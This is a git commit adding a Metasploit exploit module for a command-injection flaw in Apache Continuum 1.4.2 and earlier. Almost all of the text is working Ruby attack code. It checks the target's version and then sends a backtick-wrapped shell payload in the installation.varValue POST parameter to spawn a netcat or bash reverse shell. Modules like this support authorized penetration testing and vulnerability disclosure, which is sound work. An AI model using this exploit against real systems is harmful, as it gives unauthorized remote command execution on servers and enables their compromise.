Add Apache Continuum exploit

wvu · wvu · commit 46239d5b0d33 · 2016-06-09T22:35:38.000-05:00
diff --git a/modules/exploits/linux/http/apache_continuum_cmd_exec.rb b/modules/exploits/linux/http/apache_continuum_cmd_exec.rb
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Apache Continuum Arbitrary Command Execution',
+      'Description'     => %q{
+        This module exploits a command injection in Apache Continuum <= 1.4.2.
+        By injecting a command into the installation.varValue POST parameter to
+        /continuum/saveInstallation.action, a shell can be spawned.
+      },
+      'Author'          => [
+        'David Shanahan', # Proof of concept
+        'wvu'             # Metasploit module
+      ],
+      'References'      => [
+        %w{EDB 39886}
+      ],
+      'DisclosureDate'  => 'Apr 6 2016',
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'unix',
+      'Arch'            => ARCH_CMD,
+      'Privileged'      => false,
+      'Payload'         => {
+        'Compat'        => {
+          'PayloadType' => 'cmd cmd_bash',
+          'RequiredCmd' => 'generic netcat bash-tcp'
+        }
+      },
+      'Targets'         => [
+        ['Apache Continuum <= 1.4.2', {}]
+      ],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options([
+      Opt::RPORT(8080)
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/continuum/about.action'
+    )
+
+    if res && res.body.include?('1.4.2')
+      CheckCode::Appears
+    elsif res && res.code == 200
+      CheckCode::Detected
+    else
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => '/continuum/saveInstallation.action',
+      'vars_post' => {
+        'installation.name'     => Rex::Text.rand_text_alpha(8),
+        'installation.type'     => 'jdk',
+        'installation.varValue' => '`' + payload.encoded + '`'
+      }
+    )
+  end
+
+end
